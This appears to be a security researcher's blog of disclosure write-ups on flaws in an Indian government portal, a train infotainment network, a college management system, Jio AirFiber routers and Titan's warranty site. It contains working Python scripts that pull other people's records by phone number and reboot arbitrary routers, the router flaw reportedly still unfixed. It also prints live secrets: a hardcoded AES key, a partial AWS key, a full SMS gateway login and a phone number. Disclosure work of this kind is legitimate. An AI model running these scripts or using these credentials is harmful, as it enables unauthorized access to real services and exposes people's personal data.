When I opened the site, the design felt off, almost as if it had been generated by AI. A quick inspection revealed exposed API endpoints.

During registration the site requested a mobile number and sent an OTP for verification; surprisingly, a development/debug OTP endpoint appeared accessible, allowing me to authenticate with the API.

I tried to see what the request data was, but it looked like it was encrypted

My spidey senses kicked in, I looked over the source code of the website and found a few interesting entries/files

// encrypt_decrypt.js

function encryptData(data) {
    const secretKey = "xmcK|fbngp@!71L$";
    const key = CryptoJS.enc.Hex.parse(CryptoJS.SHA256(secretKey).toString());
    const iv = CryptoJS.lib.WordArray.random(16);

    const encrypted = CryptoJS.AES.encrypt(JSON.stringify(data), key, {
        iv: iv,
        mode: CryptoJS.mode.CBC,
        padding: CryptoJS.pad.Pkcs7,
    });

    const combinedData = iv.concat(encrypted.ciphertext);
    return CryptoJS.enc.Base64.stringify(combinedData);
}

function decryptData(encryptedData) {
    const secretKey = "xmcK|fbngp@!71L$";
    const key = CryptoJS.enc.Hex.parse(CryptoJS.SHA256(secretKey).toString());
    const decodedData = CryptoJS.enc.Base64.parse(encryptedData).toString(CryptoJS.enc.Hex);

    const ivHex = decodedData.slice(0, 32);
    const cipherHex = decodedData.slice(32);
    const iv = CryptoJS.enc.Hex.parse(ivHex);
    const ciphertext = CryptoJS.enc.Hex.parse(cipherHex);

    const decrypted = CryptoJS.AES.decrypt(
        { ciphertext: ciphertext },
        key,
        {
            iv: iv,
            mode: CryptoJS.mode.CBC,
            padding: CryptoJS.pad.Pkcs7,
        }
    );

    return JSON.parse(decrypted.toString(CryptoJS.enc.Utf8));
}

// Make globally available
window.encryptData = encryptData;
window.decryptData = decryptData;

So it was AES encrypted, but the keys are available client-side, and are static.

// global.js

// var api_base_url = "https://tngis.tnega.org/lcap_api/dipr-lcap-api/ekee";
// var api_base_url = "https://tngis.tnega.org/generic_api/ekee";
var api_base_url = "https://sfdb-web.eba-xxzkshkf.ap-south-2.elasticbeanstalk.com/api/ekee";

Okay so thats the API base url, which we will use later.

// script.js

// few interesting functions from the file

async function checkApplicationStatus(phone) {
  const payload = {
    action: "otp_operation",
    operation: "get_user_details",
    mobile_no: phone
  };

  $.ajax({
    url: `${api_base_url}/v1/fn_otp_operation`,
    type: "POST",
    headers: { "X-App-Key": "TN_EKEE", "X-App-Name": "TN_EKEE" },
    data: { data: encryptData(payload) },
    dataType: "json",
    success: function (response) {
      if (response.success === 1) {
        if (response.user_count > 0 && response.user) {
          handleExistingApplication(response);
        } else {
          handleNewUser(phone);
        }
      } else {
        console.error("Failed to check application status:", response.message);
        handleNewUser(phone);
      }

      hideOTPModal();
    },
    error: function () {
      console.error("Failed to check application status");
      handleNewUser(phone);
      hideOTPModal();
    }
  });
}

function handleExistingApplication(response) {
  const user = response.user;
  const userMapping = response.user_mapping;
  window.pendingIconName = user.icon_name || '';

  // Fill basic form fields
  document.getElementById('name').value = user.name || '';
  document.getElementById('gender').value = user.gender || '';
  document.getElementById('email').value = user.email || '';
  document.getElementById('district').value = user.district || '';
  document.getElementById('dob').value = user.dob || '';
  document.getElementById('age').value = user.age || '';
  document.getElementById('education').value = user.education || '';
  document.getElementById('employmentStatus').value = user.employment_status || '';
  document.getElementById('employmentType').value = user.employment_type || '';
  document.getElementById('otherAspirations').value = user.otheraspirations || '';
  document.getElementById('respondent_type').value = user.respondent || '';

  // Handle employment type display
  if (user.employment_status == 24 || user.employment_status == 24) {
    document.getElementById('employmentTypeWrap').style.display = 'block';
  }
  document.getElementById('employmentType').value = user.employment_type || '';

  if(user.employment_type == 41) {
    document.getElementById('employmentTypeOtherSpecifyWrap').style.display = 'block';
  }
  document.getElementById('employmentTypeOtherSpecify').value = user.employmenttypeotherspecify || '';
  document.getElementById('employmentTypeOtherSpecify').required = true;
  if (user.poa_filepath || user.por_filepath) {
    $('.file_input').css('display', 'none');
    const poiFilepath = user.poa_filepath || user.por_filepath;
    const poiInput = document.getElementById('poi');
    const poiContainer = poiInput.parentElement;

    const fileName = poiFilepath.split('/').pop() || poiFilepath;

    const downloadLink = document.createElement('a');
    downloadLink.href = `${poiFilepath}`;
    downloadLink.target = '_blank';

    const icon = document.createElement('i');
    icon.className = 'fas fa-file-download';
    icon.style.marginRight = '8px';

    const text = document.createTextNode(` Download previously uploaded file`);

    downloadLink.appendChild(icon);
    downloadLink.appendChild(text);

    downloadLink.style.display = 'inline-flex';
    downloadLink.style.alignItems = 'center';
    downloadLink.style.marginTop = '8px';
    downloadLink.style.padding = '8px 12px';
    downloadLink.style.backgroundColor = '#f0f7ff';
    downloadLink.style.border = '1px solid #0f6cff';
    downloadLink.style.borderRadius = '6px';
    downloadLink.style.color = '#0f6cff';
    downloadLink.style.textDecoration = 'none';
    downloadLink.style.fontSize = '14px';
    downloadLink.style.transition = 'all 0.3s ease';

    downloadLink.onmouseenter = () => {
      downloadLink.style.backgroundColor = '#e0f0ff';
      downloadLink.style.transform = 'translateY(-1px)';
    };
    downloadLink.onmouseleave = () => {
      downloadLink.style.backgroundColor = '#f0f7ff';
      downloadLink.style.transform = 'translateY(0)';
    };

    const existingFileContainer = document.createElement('div');
    existingFileContainer.style.marginTop = '12px';
    existingFileContainer.style.marginBottom = '12px';
    existingFileContainer.style.padding = '12px';
    existingFileContainer.style.backgroundColor = '#f8fafc';
    existingFileContainer.style.borderRadius = '8px';
    existingFileContainer.style.border = '1px solid #e2e8f0';

    const title = document.createElement('div');
    title.innerHTML = '<strong><i class="fas fa-file-alt"></i> Previously Uploaded Document:</strong>';
    title.style.marginBottom = '8px';
    title.style.color = '#334155';

    existingFileContainer.appendChild(title);
    existingFileContainer.appendChild(downloadLink);

    poiContainer.appendChild(existingFileContainer);

    poiInput.dataset.existingFile = poiFilepath;
    poiInput.required = false;
  }
  // Handle POI file display (existing code remains the same)
  // ... [keep your existing POI file display code]

  localStorage.setItem('application_id', user.application_id || '');
  $('#submit_form').css('background', 'green').text('Application submitted').attr('disabled', true);

  // Store the mapping for later use
  window.pendingUserMapping = userMapping;

  // Check if dreams are already loaded
  const immediateContainer = document.getElementById('immediateDreams');
  const fiveYearContainer = document.getElementById('fiveYearDreams');
  
  // If dreams are already rendered, prefill immediately
  if (immediateContainer.children.length > 1 && fiveYearContainer.children.length > 1) {
    console.log("Dreams already loaded, pre-filling now...");
    prefillDreams(window.pendingUserMapping);
    window.pendingUserMapping = null;
  } else {
    console.log("Dreams not loaded yet, will pre-fill after loading...");

    // Wait for dreams to load
    setTimeout(() => {
      if (window.pendingUserMapping) {
        console.log("Attempting delayed pre-fill...");
        prefillDreams(window.pendingUserMapping);
        window.pendingUserMapping = null;
      }
    }, 2000); // Wait 2 seconds for dreams to load
  }

  // If icon_name exists, disable the field
  setTimeout(() => {
    if (user.icon_name) {
      const iconInput = document.getElementById('icon_name');
      if (iconInput) {
        iconInput.value = user.icon_name;
        iconInput.disabled = true;
        iconInput.style.backgroundColor = '#f8fafc';
      }
    }
  }, 1000);
  setTimeout(() => {
    disableFilledInputs('dreamForm');
  }, 1300); 


}

So according to this function, I'll be able to get anyone's data with just their phone number... right?

Lets try it out.

running checkApplicationstatus(xxxxxxxxxx) in browser JavaScript console populates the form with previously filled data, without authentication.

Wow... I think i hit a jackpot, thats the ID proof I uploaded to verify myself on the site, and it was accessible without authentication.

Well even if it had authentication, it wouldn't matter because of the debug_otp.

I wrote a quick python script to help me fetch data..

import json
import base64
import hashlib
import os
import sys
import requests
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

API_BASE_URL = "https://sfdb-web.eba-xxzkshkf.ap-south-2.elasticbeanstalk.com/api/ekee"
SECRET_KEY = "xmcK|fbngp@!71L$"


def encrypt_data(data: dict) -> str:
    # SHA256 key (same as CryptoJS.SHA256)
    key = hashlib.sha256(SECRET_KEY.encode()).digest()

    # Random 16-byte IV
    iv = os.urandom(16)

    # AES-CBC encryption
    cipher = AES.new(key, AES.MODE_CBC, iv)
    plaintext = json.dumps(data).encode()
    ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))

    # Combine IV + ciphertext and base64 encode
    combined = iv + ciphertext
    return base64.b64encode(combined).decode()


def check_application_status(phone: str):
    payload = {
        "action": "otp_operation",
        "operation": "get_user_details",
        "mobile_no": phone
    }

    encrypted_payload = encrypt_data(payload)

    headers = {
        "X-App-Key": "TN_EKEE",
        "X-App-Name": "TN_EKEE",
        "Content-Type": "application/x-www-form-urlencoded",
    }

    response = requests.post(
        f"{API_BASE_URL}/v1/fn_otp_operation",
        headers=headers,
        data={"data": encrypted_payload},
        timeout=30,
    )

    print("Status:", response.status_code)
    try:
        pretty = json.dumps(response.json(), indent=2, ensure_ascii=False)
        print(pretty)
    except Exception:
        print(response.text)

    return response

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <phone_number>")
        sys.exit(1)

    phone_number = sys.argv[1]
    check_application_status(phone_number)

soundar@fedora:~/lab/research$ python3 enkanavu.py XXXXXXXXXXXX
Status: 200
{
  "success": 1,
  "user_count": 1,
  "user": {
    "id": 81929,
    "name": "VishnuXXXXXXXXXXXXX",
    "gender": "4",
    "email": "vishnuXXXXXXXXXXXXXXXXXXx",
    "district": 25,
    "taluk": null,
    "proof": "https://sfdb-elcot-household.s3.ap-south-1.amazonaws.com/ekee/uploads/XXXXXXXXXXXXXXXXXXX.pdf?X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Security-Token=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAZPU3GJZTPFNPQU3U%2F20260223%2Fap-south-1%2Fs3%2Faws4_request&X-Amz-Date=20260223T043641Z&X-Amz-SignedHeaders=host&X-Amz-Expires=1200&X-Amz-Signature=3324b07650b9d76a3029502fb67c1fabd20835d7cb446d23c4534bb21f7200c4",
    "dob": "20XX-XX-XX",
    "age": 19,
    "education": "20",
    "employment_status": "26",
    "is_active": true,
    "created_by": 1,
    "created_ts": "2026-02-17 03:51:59.255242",
    "updated_by": null,
    "updated_ts": null,
    "proof_of_age": null,
    "application_id": "APP_XXXXXXXXXXXX_20260217035159",
    "por_filepath": "https://sfdb-elcot-household.s3.ap-south-1.amazonaws.com/ekee/uploads/XXXXXXXXXXXXXXXXXXX.pdf?X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Security-Token=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAZPU3GJZTPFNPQU3U%2F20260223%2Fap-south-1%2Fs3%2Faws4_request&X-Amz-Date=20260223T043641Z&X-Amz-SignedHeaders=host&X-Amz-Expires=1200&X-Amz-Signature=3324b07650b9d76a3029502fb67c1fabd20835d7cb446d23c4534bb21f7200c4",
    "poa_filepath": null,
    "employment_type": "",
    "mobile_no": "XXXXXXXXXXXX",
    "otheraspirations": "",
    "respondent": "8",
    "icon_name": "",
    "employmenttypeotherspecify": ""
  },
  "mobile_no": "XXXXXXXXXXXX",
  "user_mapping": {
    "usercount": 3,
    "user": [
      {
        "id": 262653,
        "user_id": 81929,
        "category_id": 1,
        "priority": 2,
        "support_option": "135",
        "created_on": "2026-02-17 03:51:59.255242",
        "application_id": "APP_XXXXXXXXXXXX_20260217035159"
      },
      {
        "id": 262652,
        "user_id": 81929,
        "category_id": 2,
        "priority": 1,
        "support_option": "154",
        "created_on": "2026-02-17 03:51:59.255242",
        "application_id": "APP_XXXXXXXXXXXX_20260217035159"
      },
      {
        "id": 262654,
        "user_id": 81929,
        "category_id": 14,
        "priority": 1,
        "support_option": "177",
        "created_on": "2026-02-17 03:51:59.255242",
        "application_id": "APP_XXXXXXXXXXXX_20260217035159"
      }
    ]
  },
  "message": "User details fetched successfully"
}

Woah... the site is leaking data including sensitive ID documents without authentication, yet the site claims "Your data is safe". LOL

I tried reaching out to TNeGA via various channels and people, but sadly I have not received a response from them.

It has a lot of features such as onboard-WiFi for infotainment, reading lights, onboard-pantry, electric outlets, and automatic doors.

The infotainment system/onboard wifi caught my eye, I was curious and I decided to dig into it after finishing a movie on Netflix(with my own hotspot, not the onboard-wifi).

to clarify at the start,
the onboard-wifi doesn’t give you internet access, it gives you intranet access. Somewhere in the train, there’s a server hosting the minimal 1950’s movies and songs.

I connected to the Vandebharatinfotainment SSID, which was an Open Network, and upon connecting my browser and my operating systems pushed the Captive Portal signin notifications, turns out that it’s the infotainment system! Yup, it intercepts all requests and presents the infotainment system on them.

It was boring, nothing interesting that I could watch, so I decided to dig in further. Fired my developer tools and monitored the requests.

There wasn’t much, it looked like a static site to me, but there were few interesting configuration files,

http://vandebharat.myinfotain.com/assets/config/config.js

config = {

    crewApiUrl: "http://myinfotain.com:3000",
}

http://vandebharat.myinfotain.com/assets/config/pisconfig.js

{
    DisplayEnglish: [{ Name: "Last Updated On", Index1: 0, Index2:1 },
    { Name: "Speed", Index1: 2 },{ Name: "Next Stop", Index1: 5 }
    ],

    TripStartDate: 5,
    TripStartTime: 6,
    PAS: 7,
     startIndex : 2,
     totalLanguages : 5,
     totalStations : 5,
    presentStation :{ id:2, name:"Present Station" },
    nextStation :{id:4, name:"Next Station"} ,
    time:5,
    pas :"Please Listen to Announcement...!",
    df:"102",
    j:"No Data Available"
}

PIS… that stands for Passenger Information System. Interesting.

There was also a dedicated page to see the current train speed, departing station, arriving station and time.
It was pulling the data from a bunch of text files.

GET http://vandebharat.myinfotain.com/assets/pis/routedata.txt
22-09-25
17:10
55 kmph
01:04
00:34
56 km

GET http://vandebharat.myinfotain.com/assets/pis/PresentNext.txt

0
2
Salem

GET http://vandebharat.myinfotain.com/assets/pis/sd.txt

0
Bangalore cantt
Coimbatore

GET http://vandebharat.myinfotain.com/assets/pis/jounney.txt

1

I looked through the source code and found these functions which described the text files.

           getAPips() {
              return this.httpClient.get(this.config.crewApiUrl + '/getAP', {
                responseType: 'text'
              })
            }
            getTrainData() {
              return this.httpClient.get(
                'assets/pis/routedata.txt?date=' + this.getCacheBreaker(),
                {
                  responseType: 'text'
                }
              )
            }
            getPASData() {
              return this.httpClient.get(
                'assets/pis/pas.txt?date=' + this.getCacheBreaker(),
                {
                  responseType: 'text'
                }
              )
            }
            getDynamicRoute() {
              return this.httpClient.get(
                'assets/pis/PresentNext.txt?date=' + this.getCacheBreaker(),
                {
                  responseType: 'text'
                }
              )
            }
            getJourneyStatus() {
              return this.date = new Date,
              this.httpClient.get(
                'assets/pis/jounney.txt?r=' + this.getCacheBreaker(),
                {
                  responseType: 'text'
                }
              )
            }
            getSD() {
              return this.date = new Date,
              this.httpClient.get(
                'assets/pis/sd.txt?r=' + this.getCacheBreaker(),
                {
                  responseType: 'text'
                }
              )
            }

getAPip() function was interesting, it was using the URL from config.js
I tried the endpoint and it returned two IP addresses

GET http://192.168.190.1:3000/getAP 

192.168.190.45
192.168.191.61

I wasn’t able to connect to the second IP since it wasn’t in my subnet range, but the first IP was running some sort of DLINK router(confirmed by the splash login page when I tried port 443)

The Crew API is some sort of NodeJS/Express server

GET http://192.168.190.1:3000/getAP -I
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Content-Length: 29
ETag: W/"1d-8a+on1OgGx3fJp7w78P968fKH/U"
Date: Mon, 22 Sep 2025 22:49:43 GMT
Connection: keep-alive

I tried some other ports on 192.168.190.1 since I noticed the info-tv’s randomly rebooting and for a split second you can see the browser trying to load something on the IP.

Yup. I was correct, it was running on port 8085, and it also had SSH and FTP ports open, though I wasn’t able to connect to them.

Port 8085 was querying live data over a websocket connection.

151.js

(
  () => {
    'use strict';
    var e,
    o = !0,
    i = function (t) {
      var s = new FileReader;
      s.readAsText(t.data),
      s.onloadend = p => {
        let r = JSON.parse(s.result.toString());
        253 == r.FunctionCode ? e.send('4,32') : postMessage(r)
      }
    },
    c = function (t) {
      o = !1
    },
    u = function (t) {
      o = !0,
      n()
    },
    l = function (t) {
      o = !0
    };
    function n() {
      setTimeout(
        function () {
          (e = new WebSocket('ws://' + location.hostname + ':8082')).onopen = c,
          e.onclose = u,
          e.onmessage = i,
          e.onerror = l
        },
        7000
      )
    }
    setInterval(() => {
      o &&
      postMessage({
        FunctionCode: 255
      })
    }, 11000),
    n()
  }
) ();

I dumped some websocket data, here below

��{ 
    "FunctionCode":253
}

��{
    "FunctionCode":7,
    "System": {
    "SystemVal": 3,
        "Date": "22-09-25",
        "Time": "17:13",
        "Speed": {
            "Title":"Speed",
            "Value":"62 kmph"
        },
        "ExpTimetoStn":  {
            "Title":"Time to Reach",
            "Value":"00:51"
        },
        "Delay":  {
            "Title":"Delay",
            "Value":"00:34"
        }, 
    "DNS":  {
            "Title":"Next Stop",
            "Value":"52 km"
        },       
        "LId": 0
    }
}
��{
    "FunctionCode":7,
    "System": {
    "SystemVal": 1,
        "Date": "22-09-25",
        "Time": "17:13",
        "Speed": {
            "Title":"Speed",
            "Value":"62 kmph"
        },
        "ExpTimetoStn":  {
            "Title":"Time to Reach",
            "Value":"00:51"
        },
        "Delay":  {
            "Title":"Delay",
            "Value":"00:34"
        }, 
    "DNS":  {
            "Title":"Next Stop",
            "Value":"52 km"
        },       
        "LId": 0
    }
}
��{
    "FunctionCode":7,
    "System": {
    "SystemVal": 1,
        "Date": "22-09-25",
        "Time": "17:13",
        "Speed": {
            "Title":"Speed",
            "Value":"62 kmph"
        },
        "ExpTimetoStn":  {
            "Title":"Time to Reach",
            "Value":"00:51"
        },
        "Delay":  {
            "Title":"Delay",
            "Value":"00:34"
        }, 
    "DNS":  {
            "Title":"Next Stop",
            "Value":"52 km"
        },       
        "LId": 0
    }
}
��{ 
    "FunctionCode":253
}

��{
    "FunctionCode":7,
    "System": {
    "SystemVal": 2,
        "Date": "22-09-25",
        "Time": "17:13",
        "Speed": {
            "Title":"Speed",
            "Value":"62 kmph"
        },
        "ExpTimetoStn":  {
            "Title":"Time to Reach",
            "Value":"00:51"
        },
        "Delay":  {
            "Title":"Delay",
            "Value":"00:34"
        }, 
    "DNS":  {
            "Title":"Next Stop",
            "Value":"52 km"
        },       
        "LId": 0
    }

Yes, there’s some weird characters present. I have no clue why, perhaps it uses some different encoding(?)

I also tried SSH and FTP,

SSH only accepted ssh-rsa, and further attempts failed because of modern libcrypto.
Unable to negotiate with 192.168.191.1 port 22: no matching host key type found. Their offer: ssh-rsa

SSH

soundar@fedora:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa root@192.168.191.1 
The authenticity of host '192.168.191.1 (192.168.191.1)' can't be established. 
RSA key fingerprint is SHA256:y8tZWtbdyaF6aduhunz/hoQG4qPollA5PhFWCb0+GD4. 
This key is not known by any other names. 
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 
Warning: Permanently added '192.168.191.1' (RSA) to the list of known hosts. 
ssh_dispatch_run_fatal: Connection to 192.168.191.1 port 22: error in libcrypto

FTP

soundar@fedora:~$ curl ftp://192.168.190.1:21
curl: (67) Access denied: 530

That’s it for now. Maybe the next time I board a VB train I’ll dig in further.

I was in my first year of college, and we had a platform to view our attendance percentages, marks, timetable, and more—essentially an Academic Management System. It was quite helpful for checking our percentages and planning class absences. Naturally, my curious mind wanted to explore this platform further. While fiddling around with it one day, I noticed a disabled section: the profile editing page.

Of course my curious mind wanted to explore this platform, and I was fiddling around with it one day and I noticed a disabled section/page, the profile editing page.

Clicking on that button would trigger a request to the server, to check if the user was allowed to modify(change their profile picture, nothing fancy).
I quickly fired up BurpSuite and intercepted the request, and swapped its response to true from false, and it opened up a Modal to upload/change my profile picture.

Interesting, Right? Yeah. I also noticed a few other requests that went through BurpSuite to this unique endpoint `https://kec.linways.com/common/api/v1/s3/get-s3-conf` and it caught my eye.

{
"success": true,
"data": {
"serverProtocol": "https",
"s3Folder": "course_materials",
"sizeLimit": "524288000",
"bucketName": "amsfilestore",
"accessKey": "AKIAX2B3ZDTX7AFQ5ENC",
"secretKey": "THQynUL7L+GbS/+u3s5SIL0LhdQC/CENSORED",
"region": "ap-south-1",
"collegeCode": "KEC"
}
}

Woah woah, what is that?
The response contained bucketName, accessKey, secretKey, region of the S3 bucket which the profile pics are being uploaded to.

Wow, I hit a jackpot. I tried the credentials and of course it worked, and funny enough it was a centralized bucket for all colleges, it had a lot of other college codenames(like KEC) and seemed to contain upload data(probably sensitive documents)

This got me hooked, I was damn sure this platform was vulnerable in 100 other ways because who the fuck sends the secretKey to the client and trusts the browser to upload the files.

I started digging around, and I figured out that I can update anyone’s profile picture with just their studentId(not random, just incremented by 1 for each student).

Gameplan is, you upload a picture to the S3 bucket, then send this payload to this URL.

POST https://kec.linways.com/student/student_details/ajax/ajax_student_list.php
Data:
fileInfo[name]=favi.png
fileInfo[key]=/2025/xyz.png
fileInfo[bucket]=amsfilestore
studentId=9154 ##modify this for each request and you can update anyone's picture
action=UPLOAD_STUDENT_PROFILE_IMG

And additionally, there’s no sanitization on fileInfo[key], which possibly leads to stored XSS.

Then I tried a few random urls, like https://kec.linways.com/academics/api/v1/student/get-student-basic-details?studentId=9170 and boom, I was able to get anyone’s data in my college(Name, Dept, Email and Batch ID)

A few more URLs were affected too, ones involving attendance.

At that point, I was pretty sure that the server was trusting the client blindly. Classic IDOR.

Extremely funny, but I went ahead and sent a report to security@linways.com, and I was declined a bounty just because I reported as an Individual.
Their exact words were, “we are currently adopting a team-based recognition approach rather than individual bounties.“

Reflecting on this experience, it's clear that curiosity and a keen eye for detail can uncover significant vulnerabilities in digital platforms. While the journey began with a simple exploration of an academic management system, it quickly escalated into discovering critical security flaws that could have had far-reaching implications. This incident underscores the importance of robust security measures and the need for organizations to be transparent and responsive when vulnerabilities are reported. Although the response from Linways was not as rewarding as expected, the offer of a paid internship indicates a recognition of the skills demonstrated. This experience serves as a reminder of the ethical responsibilities that come with hacking and the potential for positive outcomes when vulnerabilities are responsibly disclosed.

Public transparency log:

Initial report sent via email on May 15, 2025
Report acknowledged by team on May 16, 2025
I acknowledge the reply on May 16, 2025
Follow up email regarding the bounty on May 22, 2025
Bounty rejected and Paid Internship offered on May 23, 2025
I ask permission to publish my blog/transparency report on Jun 8, 2025
Team replies requesting some more time as they handle a few internal cases on Jun 13, 2025
Follow up on Jul 16, 2025
Follow up on Aug 20, 2025
No replies were received, and it looks the bugs were fixed, hence I’ve published it on September 9

I had Jio's AirFiber connection setup around September 2024 and was enjoying it(whoops, my previous FTTH provider had a lot of downtimes).

As a curious idiot of course I started messing around, and I eventually gained root access to the router and had my own fun around(with the help from a few friends at JFC-Group)

Turns out Jio had JioFieldDiagnostics app(now defunct), which was actively used by Jio Field Engineers to deploy the Outdoor Unit to deploy e-sim.

i tried installing the app on my phone and I went to "Scan QR Code" page without any logins, and I tried scanning the QR code which was present in the back side of Indoor Unit(the router)

Voila! I had the option to open JioHome from the JFD app.

Connect to ODCPE option always failed for me, looks like it had some Bluetooth Auth mechanism built in and I wasn't too interested in that either.

I clicked on the Cable Diagnostic Tests and it opened up a different page.

The refresh like looking button looked interesting, gave it a click and my router started rebooting itself. That caught my attention and I started trying out my methods.

My initial starting point was to figure out what was present in the QR Code.

QR DATA:

<?xml version="1.0" encoding="UTF-8"?>
<!--Document created by: RJIL http://jio.com -->
<MFRNAME>Telpa</MFRNAME>
<MODELNO>JIDU6801</MODELNO>
<SRNO>RTHHGXXXXXXXX</SRNO>
<EAN>86990XXXXXXX</EAN>
<MACID>4C82XXXXXXXX</MACID>
<SSID>AirFiber-Gang5y</SSID>
<PWD>phae1toXXXXXXXXXXX</PWD>

I tried incrementing the SRNO variable and tried scanning again, and it once again presented me with some data and it rebooted successfully. WOW.

I asked a few friends around for their SRNO/RSN and tried, and I was able to reboot them remotely.(It was fun, trust me :)  )

i thought I should dig in deeper, so I fired up mitmproxy and connected my phone over Wireguard and I started monitoring requests.

So each time I fire up the app, it makes request to "https://piranha.aps1.prod.rho.jiohs.net/api/Customers/login" and obtains an Authorization Bearer token, then proceeds to send requests to https://piranha.aps1.prod.rho.jiohs.net/api/nodes/RSN to get some data and then finally send a reboot request via "https://piranha.aps1.prod.rho.jiohs.net/api//Customers/{customer_id}/locations/{location_id}/nodes/{node_id}/reboot?&access_token={access_token}"

I did not take any screenshots while mitm'ing their app, sorry :(

I quickly wrote a python script, so that I can just supply the RSN/SRNO and have any AirFiber device rebooted.

I have censored credentials that was used to authenticate to the login endpoint(It was hardcoded in their JFD App. LOL)

import requests
import json


def login(email, password):
    url = "https://piranha.aps1.prod.rho.jiohs.net/api/Customers/login"
    headers = {
        'content-type': 'application/json',
        'user-agent': 'okhttp/5.0.0-alpha.11'
    }
    data = json.dumps({
        "email": email,
        "password": password
    })
    response = requests.post(url, headers=headers, data=data)
    response.raise_for_status()
    return response.json()


def get_node_details(node_id, access_token):
    url = f"https://piranha.aps1.prod.rho.jiohs.net/api/nodes/{node_id}"
    headers = {
        'Authorization': f'{access_token}'
    }
    response = requests.get(url, headers=headers)
    response.raise_for_status()
    return response.json()




def reboot_node(access_token, customer_id, location_id, node_id, delay=5):
    url = f"https://piranha.aps1.prod.rho.jiohs.net/api//Customers/{customer_id}/locations/{location_id}/nodes/{node_id}/reboot?&access_token={access_token}"
    headers = {
        'accept': 'application/json',
        'content-type': 'application/x-www-form-urlencoded',
        'user-agent': 'okhttp/5.0.0-alpha.11'
    }
    data = f"delay={delay}"
    response = requests.put(url, headers=headers, data=data)




def main():
    email = "XXXX@jio.com"
    password = "XXXXXXXXXXXXXXXX"
    node_id = input("Enter the RSN (node ID): ")
    login_response = login(email, password)
    access_token = login_response["id"]
    user_id = login_response["userId"]
    node_details = get_node_details(node_id, access_token)
    customer_id = node_details["customerId"]
    location_id = node_details["locationId"]
    reboot_response = reboot_node(access_token, customer_id, location_id, node_id)
    print("IDU Rebooted :)")


if __name__ == "__main__":
    main()

I sent over the report, they asked for a more detailed one with more steps and I did too.

At the end they closed it with,

Dear Security Researcher,

This domain does not belong to us , it's an out of scope bug so we are closing this as false positive.

Regards,

Jio Bugs Reporting Team

I guess, jiohs.net might be Plume's, but the hardcoded credentials present in the app was funny to me.

Disclosure: No bug bounty was awarded.

This vulnerability is still to be fixed, but since Jio has marked it as "Out of Scope" I decided to publish this in my blog.

If anyone from JIo wants to contact me regarding the above, they can do so at, administrator @ soundar dot net.

Thank you for reading! :)

It was one fine evening and I was sipping coffee. I noticed that I had an unregistered Titan watch lying around and I decided to register it so that I could claim warranty.

Looked it up and https://uidreg.titan.in popped up offering one extra year of warranty registered. Hell Yeah, who misses one free year of warranty.

The site loaded very slow, like it was the 2000's, and it eventually loaded and looked very old.

The Signup/Register as customer process required a phone number and while typing my phone number out, I made a mistake and only typed out 9 digits.

I noticed a weird URL and a JSON message pop up, and I was interested and curious to dig in further.

I tried sending a POST request to this endpoint, and voila! we got treasure.

curl 'https://uidreg.titan.in/ajax.php?action=otp-mobile' \
-X POST \
--data-raw 'mobile-no-dup=12345&email-no-dup=&country-code-dup=&stime=1692202652'

The server replied with,

https://www.smsjust.com/sms/user/urlsms.php?username=titansonnet&pass=kap@user!123&senderid=TITANS&dest_mobileno=919842636690&message=128412%20is%20the%20OTP%20for%20Titan%20online%20product%20registration.%20OTP%20is%20valid%20for%2002%20Minutes%20%20%20%20%20%20%20%20%20%20%20%20%20Regards%20TITAN%20COMPANY%20LIMITED&response=Y4095484937-2023_08_16{"status":"unsuccess"}"

Wow we just got a bunch of information,

We got the username and password for the smsjust platform and... the OTP itself? LOL.

I tried the credentials titansonnet:kap@user!123 on https://smsjust.com/blank/login.php and it worked! Tada!

I was able to login, I tried sending a few test messages to my number and it worked!

So to summarize,

The urlsms.php didn't sanitize the inputs and threw API URL's containing sensitive credentials.

Finding this was fun, I wrote a vulnerability disclose report to Titan on August 16, 2023.

Got no replies, and the vulnerability was patched on August 26, 2023.

No bounty nor any replies were sent.

Thank you for reading the shittiest blog post in history, I'll improvise and post more of my previous findings.